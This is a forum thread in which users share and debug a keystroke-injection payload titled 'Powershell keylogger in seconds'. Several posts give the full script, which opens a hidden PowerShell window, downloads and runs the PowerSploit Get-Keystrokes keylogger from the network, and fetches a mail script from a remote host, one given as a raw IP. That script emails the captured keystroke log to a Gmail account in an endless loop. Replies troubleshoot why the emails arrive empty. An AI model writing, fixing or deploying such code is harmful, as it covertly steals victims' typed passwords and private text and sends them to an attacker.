[Powershell keylogger in seconds]

19 minutes ago, PoSHMagiC0de said:

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

The default if ran on its own with no parameters it should create a key.log. in the temp folder.  The line below in the payload.txt changes that to key.txt if ran with it.

STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

<ight want to check your AV too.  The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.  


Thank's , so if a got it right tue script should look like this . I'm going to try in a sec

 

So if a followed you right tu script should look like this

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
ENTER

 

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxx@gmail.com'
$ReportEmail.To.Add('xxxx@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

[Powershell keylogger in seconds]

31 minutes ago, PoSHMagiC0de said:

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location.  Where ever $env:temp points to.  If you type that out in powershell it will tell you.  Look for the key.txt while just running the keylogger.  If a file shows up and holds data then something is up with the emailer.  if you get no key.txt or no stuff in it then the keylogger is not logging.

Nop , i ad a look on %temp% et there is no log.txt created

tryed both script , same issue . Getting empty mails

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1

[Powershell keylogger in seconds]

On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script maybe this and the correction that may need to happen.

while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

 Hey thank for reply , y try to modify the mail.ps1 with

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

i'm still getting the same issue .. empty emails. I can't solve this probleme ?

[Powershell keylogger in seconds]

On 3/8/2017 at 6:57 AM, Speed09 said:

I'm still lokking for the solution. Same as " The modern Mind" : getting empty mails.
does any one got a working script or know what's wrong whit the last one ?

 

 

[Powershell keylogger in seconds]

On 09/03/2017 at 7:53 PM, henna3 said:

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.log
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
ENTER

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'myemail'
$ReportEmail.To.Add('myemail')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}

 

I'm still getting empty emails with this . does any one see anything who could help :D

[Powershell keylogger in seconds]

i'm getting the same isue.
I'm getting empty email with speed09's script